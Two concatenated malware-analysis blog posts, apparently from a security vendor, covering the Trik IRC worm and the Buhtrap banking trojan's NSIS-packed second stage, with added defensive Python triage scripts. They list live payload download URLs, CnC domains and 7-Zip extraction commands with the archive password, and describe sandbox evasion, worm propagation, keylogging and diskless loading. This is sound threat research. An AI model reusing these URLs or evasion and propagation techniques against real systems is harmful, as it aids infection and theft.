[Images: second_version_vt, certificate_invalid]

 

The following analysis focuses on the recent sample with sha256 0b6258dc856fb84d11d368d3c8a4d6b3a379297ab08efa89b3f1a6ea5f556558.

 

 

Packer

Similar to the first version, this .NET packer's compressed data is in its resource section. It also has a loader that first checks for sandbox and virtualization software before loading the payload.

The loader first decrypts its configuration from its resource section. The configuration is an array that defines the execution flow of the malware, including mutex names. Based on the configuration, it can also remove the mark that identifies a file as downloaded from the internet by deleting the alternate data stream “(unknown):Zone.Identifier”. This bypasses the browser and Windows dialog warning that the file was downloaded from the internet, and indicates that the attackers use drive-by downloads as a means to install this bot.

[Image: packer_decrypt_config]

 

Armoring

This variant also detects the following software, which are popular sandbox and network analysis tools:

  • SandBoxie
  • Fiddler
  • Wireshark
  • WPE

[Image: packer_anti]

 

The configuration also identifies the process into which it will inject its code. It may choose from any of the following:

  • vbc.exe
  • RegAsm.exe
  • AppLaunch.exe
  • svchost.exe
  • notepad.exe
  • self

In our sample, it injects into itself by launching a suspended copy of its own process and writing the payload into it.

[Image: RunPE_starting]

 

The injected code is stored encrypted in the resource section. The decryption is a combination of rolling XOR operations, with the keys also defined in the configuration.

[Image: decryption]

 

Main Payload

The unpacked code is not a .NET assembly but native C++ code. The version of this bot, v2.6, is identified from its pdb reference.

  • C:\Users\s\Desktop\Home\Code\Trik v2.6\Release\Trik.pdb

 

Similar to the earlier version, the unpacked code is straightforward.

It first runs its anti-analysis, anti-sandbox and anti-virtualization checks. If any of these trigger, it uninstalls itself.

[Image: payload_anti]

 

Anti-Virtualization

[Image: Anti_virtual]

Blacklisted Processes

[Image: blacklisted_processes]

Blacklisted DLLs

[Image: blacklisted_DLL]

Blacklisted Window Names

[Image: blacklisted_window_names]

Blacklisted File Names

[Image: blacklisted_filename]

Blacklisted File Paths

[Image: blacklisted_file_path]

Blacklisted User Names

[Image: blacklisted_usernames]

 

“Tequilaboomboom” might be the preferred user name of the author used during development of the malware.

 

To check whether it has already infected the system, it looks for the mutex name “t71”. It also checks whether it is running as:

  • %windir%\M-50504502689047502405034500693020490\winmgr.exe

If not, it creates a copy of itself at the path above. It also adds itself to the Authorized Applications list in the Firewall Policy settings, creates autostart entries and disables the Windows Defender service.

It then creates four threads that make up the main payload routine.

 

Worm Routine on Removable and Network Drives

This is not a typical worm routine that drops a copy of itself into target folders or drives. Instead, it drops a script that downloads a copy, most likely an updated version, of Trik. This is another evasion technique employed by the malware: even if the current version of the malware is already detected, the infected drives carrying the worm components still have a chance to evade detection.

Trik first checks whether the download URLs are reachable by iterating over a list of URLs and trying to download the “.exe” into the temp folder. For the sample we checked, the download URLs are the following:

 

  • http://124[.]158[.]10[.]82/t.exe
  • http://125[.]212[.]217[.]30/t.exe
  • http://220[.]181[.]87[.]80/t.exe
  • http://125[.]212[.]217[.]33/t.exe
  • http://210[.]211[.]116[.]246/t.exe
  • http://host5050[.]ru/t.exe
  • http://host5051[.]ru/t.exe
  • http://ouefuguefhuwuhs[.]ru/t.exe
  • http://uwgfusubwbusswf[.]ru/t.exe           

 

After successful verification, it proceeds to look for specific drives. It targets removable and remote drives, except drives “a” and “b”.

[Image: Worm_routine]

 

Depending on the type of drive, it will drop the following files:

 

  • Autorun.inf
  • DeviceManager.bat
  • Manager.bat (if target drive is network drive)
  • Manager.js (if target drive is removable)
  • .lnk (shortcut file to Manager.js or Manager.bat)

Autorun.inf functions as an autostart, so simply opening the drive executes the malware. It runs Manager.bat or Manager.js, which in turn executes DeviceManager.bat. DeviceManager.bat contains a PowerShell script that downloads and executes a copy or an update of Trik as %temp%\winupd.exe. As an additional evasion technique, it inserts random strings between the lines of the scripts. For example, the contents of autorun.inf are as follows:

[Image: autorun_inf]

Without the randomizer, the script contains only the following:

[Image: autorun_inf_no_random]

DeviceManager.bat runs a PowerShell script or launches bitsadmin.exe to download Trik. It contains the following (we removed the random strings to show clearly how the script works):

[Image: device_manager]

 

Worm Routine on Fixed Drives

Aside from spreading via removable and network drives, it also propagates a copy of itself into specific folders on fixed drives. It targets web root folders, FTP folders and other shared folders, looking for the following substrings in the folder name:

[Image: share_folder_sub_strings]

If a matching folder is found, it replaces every “.exe” file in that folder with a copy of itself. Likewise, for every “.zip” or “.rar” in that folder, it adds a copy of itself as “README.txt.scr”.

[Image: worm_routine_2]
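The two propagation routines above leave distinctive traces: the Autorun.inf/DeviceManager.bat/Manager.* file set in a drive root, and archives that gained a README.txt.scr member. The following is an added example (not code from the original post) that triages a drive or share folder for both; the demo layout it builds is constructed, the folder name “htdocs” is only an illustrative share-like name, and .rar files are listed rather than opened because the standard library cannot read them.

```python
import os
import tempfile
import zipfile

# File set Trik drops into removable and network drives (from the analysis above).
TRIK_DROPPER_FILES = {"autorun.inf", "devicemanager.bat"}
TRIK_LAUNCHERS = {"manager.bat", "manager.js"}
TRIK_ARCHIVE_PAYLOAD = "readme.txt.scr"


def triage_drive_root(root):
    """Report Trik worm artefacts in the root of a drive (or any folder)."""
    findings = []
    present = {name.lower() for name in os.listdir(root)}
    launchers = present & TRIK_LAUNCHERS
    if TRIK_DROPPER_FILES <= present and launchers:
        findings.append("Trik dropper set present: autorun.inf + DeviceManager.bat + "
                        + ", ".join(sorted(launchers)))
    shortcuts = sorted(n for n in present if n.endswith(".lnk"))
    if shortcuts and launchers:
        findings.append("shortcut(s) likely pointing at the launcher: " + ", ".join(shortcuts))
    return findings


def find_trik_archive_payloads(folder):
    """Look inside .zip files below `folder` for a README.txt.scr member; .rar files are only listed."""
    result = {"zip_hits": [], "rar_uninspected": []}
    for dirpath, _, filenames in os.walk(folder):
        for name in filenames:
            path = os.path.join(dirpath, name)
            lower = name.lower()
            if lower.endswith(".zip") and zipfile.is_zipfile(path):
                with zipfile.ZipFile(path) as zf:
                    for member in zf.namelist():
                        if os.path.basename(member).lower() == TRIK_ARCHIVE_PAYLOAD:
                            result["zip_hits"].append((path, member))
            elif lower.endswith(".rar"):
                result["rar_uninspected"].append(path)
    return result


def build_demo_drive():
    """Construct a fake infected drive layout for the demonstration (placeholder text, no malware)."""
    root = tempfile.mkdtemp(prefix="trik_demo_")
    for name in ("Autorun.inf", "DeviceManager.bat", "Manager.js", "Removable Disk.lnk"):
        with open(os.path.join(root, name), "w") as fh:
            fh.write("rem constructed placeholder\n")
    share = os.path.join(root, "htdocs")            # illustrative web-root-like folder name
    os.makedirs(share)
    with zipfile.ZipFile(os.path.join(share, "site-backup.zip"), "w") as zf:
        zf.writestr("README.txt.scr", b"placeholder bytes, not an executable")
        zf.writestr("index.html", "<html></html>")
    return root


if __name__ == "__main__":
    demo_root = build_demo_drive()
    print(triage_drive_root(demo_root))
    print(find_trik_archive_payloads(demo_root))
```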

 

Backdoor Routine

 

Trik is an IRC backdoor. The sample we analyzed connects to any of 18 hardcoded IRC servers, all on port 5050. The list begins with the same IP addresses and .ru domains used for the download URLs above and continues with further random-looking .ru domains.

 


If one of the IRC servers is online, it issues a NICK message containing system information and a USER command. The USER command carries fixed parameters, always ‘x “” “x” :x’.

The NICK message contains system information including the Windows version, keyboard layout and whether the user is an administrator.

[Image: NICK]

Once connected, it waits for specific commands. It looks for the IRC numerics “001”, “433” and “332” in server messages and treats them as command signals. On 001 the bot joins a specific channel. On 433 the bot sends system information. The 332 (channel topic) message carries additional sub-commands, which can instruct the bot to:

 

  • Remove itself from the system
  • Send more system information
  • Download and execute files

 

It also targets specific countries by looking up the geolocation of the infected user through http://api.wipmania.com/. It only downloads on systems in a list of countries hardcoded in its body; the list contains only countries from the Americas and Europe.
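The IRC handshake described above (fixed USER parameters, JOIN on 001, system info on 433, commands via the 332 topic) can be matched in captured sessions. The following is an added example (not code from the original post): a small IRC message parser plus a session scorer. The capture format (direction, line) and the sample session, including the NICK text, are constructed; only the USER parameters and port come from the analysis.

```python
# Fixed USER parameters Trik sends, as quoted above: USER x "" "x" :x
TRIK_USER_PARAMS = ["x", '""', '"x"', "x"]
TRIK_PORT = 5050


def parse_irc_line(line):
    """Split an IRC message into (prefix, command, params); the trailing ':' parameter is kept whole."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    params = head.split()
    command = params.pop(0).upper() if params else ""
    if sep:
        params.append(trailing)
    return prefix, command, params


def analyze_irc_session(port, messages):
    """Score a captured session against Trik's behaviour.

    `messages` is a list of (direction, line) pairs, direction 'C' for client-to-server
    and 'S' for server-to-client.
    """
    indicators = []
    nick = None
    welcome_seen = False
    for direction, line in messages:
        _, command, params = parse_irc_line(line)
        if direction == "C" and command == "NICK" and params:
            nick = params[0]
        elif direction == "C" and command == "USER" and params == TRIK_USER_PARAMS:
            indicators.append("fixed Trik USER signature")
        elif direction == "S" and command == "001":
            welcome_seen = True                      # bot joins its channel in response
        elif direction == "C" and command == "JOIN" and welcome_seen and params:
            indicators.append(f"JOIN {params[0]} in response to 001")
            welcome_seen = False
        elif direction == "S" and command == "433":
            indicators.append("433 received; Trik answers it with system information")
        elif direction == "S" and command == "332":
            indicators.append("channel topic (332) received; Trik reads its commands from the topic")
    if port == TRIK_PORT:
        indicators.append(f"server port {TRIK_PORT} matches the sample's hardcoded port")
    return {
        "nick": nick,
        "indicators": indicators,
        "likely_trik": "fixed Trik USER signature" in indicators,
    }


# Constructed session modelled on the flow described above (the NICK text is invented).
SAMPLE_SESSION = [
    ("C", "NICK [Win7|US|admin]constructed"),
    ("C", 'USER x "" "x" :x'),
    ("S", ":irc.example 001 [Win7|US|admin]constructed :Welcome"),
    ("C", "JOIN #constructed"),
    ("S", ":irc.example 332 [Win7|US|admin]constructed #constructed :constructed topic text"),
]

if __name__ == "__main__":
    print(analyze_irc_session(5050, SAMPLE_SESSION))
```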

 

Cyphort detects Trik as TROJAN.KIRTS.CY

Buhtrap Malware: What Every Bank’s Security Team Needs To Know


In our recent blog, we discussed the delivery of Buhtrap through a compromised website and a recent web exploit. In this blog, we focus on the second-stage payload and the state of the Buhtrap operation.

The Buhtrap downloader performs checks before it infects a system. Either the system must have banking processes or banking software running, mostly Russian, or there must be an indication that the system has visited one of the Russian banks defined in its list.

If the system meets either of these two requirements, it downloads and executes the next-stage malicious payload; otherwise, it downloads a benign sample.

 

Technical Analysis of Second Stage Payload

[Image: cnc_landing]

The second-stage payload is an NSIS-compiled sample, as seen in previous Buhtrap samples. This is one way Buhtrap tries to evade AV detection: by disguising itself as an installer. NSIS is open-source software widely used to build installers. Recently, we have seen a trend of ransomware adopting this method, as in the case of Locky and Cerber.

The sample is also digitally signed with a valid certificate and carries file properties and version information.

[Image: file_prop]

Installation

Inside the NSIS package is a password-protected 7-Zip archive in which all of its components are stored. A command-line 7-Zip tool (7za.exe) is included in the package to unpack the component files. The password is hard-coded in the NSIS script and differs from the passwords of other Buhtrap samples we have seen; for this sample, the password is “p2DP9ENv5bK”. The installer also modifies file timestamps using a custom utility, FileTouch.exe, which is essentially equivalent to the touch utility on Linux.

Below are snippets of the NSIS script that we extracted:

[Image: nsis_2]

We executed the file on our test machine, but it did nothing. Inspecting the NSIS script reveals that it checks whether the system language is Russian via GetSystemDefaultLangID.

[Image: nsis_1]

We hooked this API and forced the malware to believe it was running on a Russian system.

[Image: hook_getsystemdefault]

After which, the following commands and processes were observed:

attrib -h -s -r "C:\Users\Administrator\AppData\Roaming\Microsoft\Zerno"

7za.exe x -p2DP9ENv5bK install.dat dev2055.tmp -aoa

7za.exe x -p2DP9ENv5bK dev2055.tmp -aoa -o8992023.tmp

7za.exe x -p2DP9ENv5bK install.dat FileTouch.exe -aoa

C:\Users\Administrator\AppData\Roaming\Microsoft\Zerno\zerno.exe

As shown above, the malware components are extracted into “%AppData%\Microsoft\Zerno”, and zerno.exe is then executed. The Zerno folder contains the following files:

[Image: zerno_folder]

Of these files, only zerno.exe and msvcr71.dll are malicious. The others are benign files that belong to the Notepad++ software. This is an attempt to obscure its malicious behavior by posing as a legitimate Notepad++ installer.
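
The command trace shown above carries most of the indicators a responder needs. The following script is an added example (it is not Cyphort's tooling and not the malware's code): it tokenizes that kind of process trace, pulls out the 7-Zip password, the archives and members that were unpacked, the extraction directory, the paths whose hidden/system attributes were cleared, and the binary launched at the end, and then explains why the sequence looks like a staged dropper. The trace lines are constructed from the commands listed above; 7-Zip's -p switch carries the password directly after the letters -p, so the parser reports the value that follows -p on the command line.

```python
"""Triage of the process trace observed during the NSIS payload's installation.

Added example, not Cyphort's tooling: parses a command-line trace like the one
in the post and extracts dropper indicators from it.  The trace below is
constructed from the command lines the post lists.
"""
import re
from dataclasses import dataclass, field
from typing import List, Set

# Constructed from the commands observed in the post (straight quotes).
OBSERVED_TRACE = [
    r'attrib -h -s -r "C:\Users\Administrator\AppData\Roaming\Microsoft\Zerno"',
    r'7za.exe x -p2DP9ENv5bK install.dat dev2055.tmp -aoa',
    r'7za.exe x -p2DP9ENv5bK dev2055.tmp -aoa -o8992023.tmp',
    r'7za.exe x -p2DP9ENv5bK install.dat FileTouch.exe -aoa',
    r'C:\Users\Administrator\AppData\Roaming\Microsoft\Zerno\zerno.exe',
]

# A token is either a double-quoted string (group 1) or a run of non-spaces (group 2).
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line, honouring double quotes but leaving
    backslashes alone (shlex.split would treat them as escapes)."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in _TOKEN.finditer(cmdline)]


@dataclass
class InstallIndicators:
    archive_passwords: Set[str] = field(default_factory=set)
    archives: Set[str] = field(default_factory=set)
    extracted_members: Set[str] = field(default_factory=set)
    output_dirs: Set[str] = field(default_factory=set)
    attrib_cleared_paths: Set[str] = field(default_factory=set)
    executed_binaries: List[str] = field(default_factory=list)


def triage_trace(lines: List[str]) -> InstallIndicators:
    ind = InstallIndicators()
    for line in lines:
        toks = tokenize(line.strip())
        if not toks:
            continue
        image = toks[0].rsplit("\\", 1)[-1].lower()   # basename of the program
        if image == "attrib":
            # "attrib -h -s -r <path>": hidden/system/read-only cleared on <path>
            ind.attrib_cleared_paths.update(
                t for t in toks[1:] if not t.startswith(("-", "+")))
        elif image == "7za.exe" and len(toks) > 1 and toks[1] == "x":
            positional = []
            for t in toks[2:]:
                if t.startswith("-p"):        # -p{password}
                    ind.archive_passwords.add(t[2:])
                elif t.startswith("-o"):      # -o{output directory}
                    ind.output_dirs.add(t[2:])
                elif t.startswith("-"):       # other switches, e.g. -aoa (overwrite all)
                    continue
                else:
                    positional.append(t)
            if positional:                    # archive first, then optional member names
                ind.archives.add(positional[0])
                ind.extracted_members.update(positional[1:])
        elif image.endswith(".exe"):
            ind.executed_binaries.append(toks[0])
    return ind


def assess(ind: InstallIndicators) -> List[str]:
    """Return the reasons this install sequence looks like a staged dropper."""
    reasons = []
    if ind.archive_passwords:
        reasons.append("password-protected archive unpacked with 7za.exe "
                       f"(password(s): {', '.join(sorted(ind.archive_passwords))})")
    for path in sorted(ind.attrib_cleared_paths):
        if "\\appdata\\" in path.lower():
            reasons.append(f"hidden/system attributes cleared on AppData path: {path}")
    for exe in ind.executed_binaries:
        if any(exe.lower().startswith(p.lower() + "\\") for p in ind.attrib_cleared_paths):
            reasons.append(f"binary launched from that same directory: {exe}")
    return reasons


if __name__ == "__main__":
    found = triage_trace(OBSERVED_TRACE)
    for reason in assess(found):
        print("-", reason)
```

On the trace above the script reports three reasons: a password-protected archive was unpacked, attributes were cleared on a directory under AppData, and the final executable was launched from that same directory. Any one of these is common in legitimate installers; all three together, starting from a process that is not a known installer, is the pattern worth alerting on.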

For persistence, it creates a shortcut in the Startup folder that launches zerno.exe at every start-up.

[Image: zerno_startup]

What Does this Malware Do?

The main executable is zerno.exe; interestingly, its only job is to load the msvcr71.dll library (a name borrowed from the legitimate Microsoft Visual C++ runtime library), which performs all the malicious behavior.

Msvcr71.dll

This is where all the malicious routines reside. It is trojan-spyware with the following functions:

  • Keylogger
  • Get System Info
  • Read Smart Card Info
  • Downloader

Keylogger

The keylogger thread creates an invisible window with its own window procedure, then retrieves and handles the messages delivered to it. It logs the captured keystrokes to “uninstall.log” in the %temp% folder.

[Image: uninstall_sample2]

The following snapshot illustrates how the keylogger routine is implemented.

[Image: keylogger]

Smart Card Reader

One of its more interesting payloads reads smart card information. It lists the available smart card readers and their status using the “WinSCard.dll” APIs:

[Image: winscard]

It does not actually read the contents of the smart cards; it only determines the readers' status. It logs all of this information to “uninstall.log”.

Downloader

It is also capable of downloading additional malware from its CnC server. Another interesting feature of this malware is diskless loading, chosen by inspecting the server's response. The first two bytes are checked: if the downloaded file starts with ‘MZ’ (0x5A4D read as a little-endian word), it writes the file to the %temp% folder and executes it; if the response starts with “LD” (0x444C), it only loads the malware into memory.

[Image: detectedmz]

Diskless Loading

[Image: diskless_loading]

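The same two-byte prefix check the downloader performs can be turned around and run by a defender over HTTP response bodies captured by a proxy or sandbox, to tell a disk drop from a diskless load. The script below is an added example, not the malware's code; the response bodies and the cnc.example URLs are constructed.

```python
"""Classifying a CnC response the way the Buhtrap downloader does.

Added example (not the malware's code): applies the two-byte prefix check from
the post to captured response bodies.  'MZ' means the body is written to %temp%
and executed; 'LD' means it is loaded into memory only.  Sample bodies below are
constructed.
"""
import struct
from typing import List, Tuple

DROP_TO_DISK = "drop to %temp% and execute"   # body begins with 'MZ'
LOAD_IN_MEMORY = "diskless load"              # body begins with 'LD'
IGNORED = "ignored"                           # anything else

# The x86 code compares the first WORD of the buffer; on a little-endian machine
# the bytes 'M','Z' (0x4D,0x5A) read as 0x5A4D and 'L','D' (0x4C,0x44) as 0x444C.
MZ_WORD = 0x5A4D
LD_WORD = 0x444C


def prefix_word(body: bytes) -> int:
    """First two bytes of the body as a little-endian WORD, or -1 if too short."""
    if len(body) < 2:
        return -1
    return struct.unpack_from("<H", body, 0)[0]


def classify_response(body: bytes) -> str:
    word = prefix_word(body)
    if word == MZ_WORD:
        return DROP_TO_DISK
    if word == LD_WORD:
        return LOAD_IN_MEMORY
    return IGNORED


def triage_capture(responses: List[Tuple[str, bytes]]) -> List[Tuple[str, str]]:
    """Label each (url, body) pair.  Diskless loads deserve the most attention:
    no file ever reaches disk, so a file-based scanner never sees the payload."""
    return [(url, classify_response(body)) for url, body in responses]


# Constructed sample responses: a PE header stub, an 'LD'-prefixed blob, HTML, and an empty body.
SAMPLE_CAPTURE = [
    ("http://cnc.example/a", b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56),
    ("http://cnc.example/b", b"LD" + b"\x00" * 62),
    ("http://cnc.example/c", b"<html><body>ok</body></html>"),
    ("http://cnc.example/d", b""),
]

if __name__ == "__main__":
    for url, verdict in triage_capture(SAMPLE_CAPTURE):
        print(f"{url}: {verdict}")
```

The point of the 'LD' branch for detection is that the usual file-creation telemetry never fires; coverage for that path has to come from the network side (the POST to the CnC domain and the response prefix) or from memory inspection of the zerno.exe process.
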
CnC server

It communicates with its CnC server, “quotedb.info”, via HTTP POST. All the communication we observed is encrypted.

[Image: capture]

State of Buhtrap Operation

As stated in our previous post, the IP address of rozhlas.site is 50.7.86.243. We looked into the domain history of this IP and found some interesting information about the current state of Buhtrap.

Domain                                 Last Resolved
getadobe.org                           5/10/2016
chromelabs.org                         5/13/2016
adobelabs.org                          5/14/2016
canvaslabs.org                         5/22/2016
57569b378f3fb.archive.getadobe.org     6/7/2016
chrome.services                        7/2/2016
get.adobelabs.org                      7/2/2016
safechrome.services                    7/11/2016
www.safechrome.services                7/28/2016
cdn.lidovky.site                       8/9/2016
rozhlas.site                           8/17/2016
getcanvas.org                          9/14/2016
medioca-room02.org                     9/28/2016

The domain history shows that the actors used this IP from May to September 2016, and it is quite possible that they are still using it. Looking into the details of each domain, we find multiple samples which, although they behave differently, appear to be related to the Buhtrap operation. For instance, five samples downloaded from getadobe.org behave differently from the sample described in this post. Kaspersky detects those samples as “Trojan.Win32.Karamanak”, which is also its detection name for the sample in this post.

As the list shows, they also use domain names that reference Chrome, Adobe, or popular graphics software as a way to keep a low profile.
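
Pivoting on the shared IP is the kind of work worth scripting. The following added example (not Cyphort's tooling) takes the domain history rows from the table above, flags the names that borrow a popular-software brand, and reports the activity window and per-month counts the history covers. The rows are copied from the table; the brand keyword list and the single-label public-suffix assumption are my own choices.

```python
"""Pivoting on the shared CnC IP's domain history.

Added example, not Cyphort's tooling.  Rows are copied from the post's table;
BRAND_KEYWORDS is my selection based on the brands the post names.
"""
from datetime import date, datetime
from typing import Dict, List, Tuple

DOMAIN_HISTORY: List[Tuple[str, str]] = [
    ("getadobe.org", "5/10/2016"),
    ("chromelabs.org", "5/13/2016"),
    ("adobelabs.org", "5/14/2016"),
    ("canvaslabs.org", "5/22/2016"),
    ("57569b378f3fb.archive.getadobe.org", "6/7/2016"),
    ("chrome.services", "7/2/2016"),
    ("get.adobelabs.org", "7/2/2016"),
    ("safechrome.services", "7/11/2016"),
    ("www.safechrome.services", "7/28/2016"),
    ("cdn.lidovky.site", "8/9/2016"),
    ("rozhlas.site", "8/17/2016"),
    ("getcanvas.org", "9/14/2016"),
    ("medioca-room02.org", "9/28/2016"),
]

# Brands the actors imitated in this campaign (my selection, from the post).
BRAND_KEYWORDS = ("adobe", "chrome", "canvas")


def parse_date(text: str) -> date:
    """Dates in the table are US-style m/d/yyyy."""
    return datetime.strptime(text, "%m/%d/%Y").date()


def registrable_label(domain: str) -> str:
    """Label left of the public suffix.  Assumes a one-label suffix, which holds
    for .org/.site/.services; production tooling should consult the PSL."""
    parts = domain.lower().strip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def brand_hits(domain: str) -> List[str]:
    """Brand keywords embedded in the registrable label, e.g. 'getadobe' -> ['adobe']."""
    label = registrable_label(domain)
    return [k for k in BRAND_KEYWORDS if k in label]


def flag_lookalikes(rows: List[Tuple[str, str]]) -> List[Tuple[str, str, List[str]]]:
    """Rows whose domain imitates a brand, with the brands matched."""
    return [(d, last, brand_hits(d)) for d, last in rows if brand_hits(d)]


def activity_window(rows: List[Tuple[str, str]]) -> Tuple[date, date]:
    """Earliest and latest 'last resolved' dates in the history."""
    days = sorted(parse_date(last) for _, last in rows)
    return days[0], days[-1]


def monthly_counts(rows: List[Tuple[str, str]]) -> Dict[str, int]:
    """How many domains last resolved in each month (YYYY-MM)."""
    counts: Dict[str, int] = {}
    for _, last in rows:
        key = parse_date(last).strftime("%Y-%m")
        counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == "__main__":
    first, last = activity_window(DOMAIN_HISTORY)
    print(f"history spans {first} to {last}")
    for domain, seen, brands in flag_lookalikes(DOMAIN_HISTORY):
        print(f"{domain:40} {seen:10} imitates {', '.join(brands)}")
```

Ten of the thirteen names match a brand keyword; the three that do not (cdn.lidovky.site, rozhlas.site, medioca-room02.org) are the ones that would need a different pivot, such as the shared IP itself or sample overlap, to be tied to the campaign.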

Chromelabs.org

Using this domain, the actors started using CVE-2016-0189 as their infection method. In fact, they used the same binary exploits found in Offensive Security's GitHub repository. The following files were downloaded from this domain:

  • http://chromelabs.org/data/shell32/51d2a95ddc.dll
  • http://chromelabs.org/a3b4x62.exe
  • http://chromelabs.org/blog/dsfsdhdh.vbs
  • http://chromelabs.org/news/dsfsdhdh.exe
  • http://chromelabs.org/track/automate.js

Adobelabs.org

A similar NSIS-compiled payload was downloaded from this domain.

The following files, posing as installers, also connect to this domain:

MD5                                 Filename                    Signer
2530a11c4fa57fd3f9cdc30c8fd40878    Shockwave_setup.exe         LLC LVIV IT!
ead9344c8022e0479ebe272472d6197a    chrome_update_win.exe       Bit-Trejd
fda920b3d72728f6a89672e07a900c70    chrome_update.exe           LLC LVIV IT!
e5f01322da2b6cda707a8135c7320b79    shockwave_setup_winax.exe   Bit-Trejd

Getcanvas.org

The samples we have seen from getcanvas.org are the same samples we found on rozhlas.site.

Conclusion

Based on this research, the actors appear to follow consistent patterns in their attacks:

  • Using digitally signed malware
  • Using NSIS and hiding their components in a password protected archive
  • Using domains that resemble popular software, e.g. Adobe, Chrome
  • Constantly changing their CnC domain but using the same IP

It is also evident that the actors are still very active. They are careful not to infect systems that are not their targets, which allows them to stay under the radar for as long as possible. These tactics, techniques and procedures are the hallmark of Advanced Persistent Threat groups.

Analysis by Dhruval Gandhi & Paul Kimayong.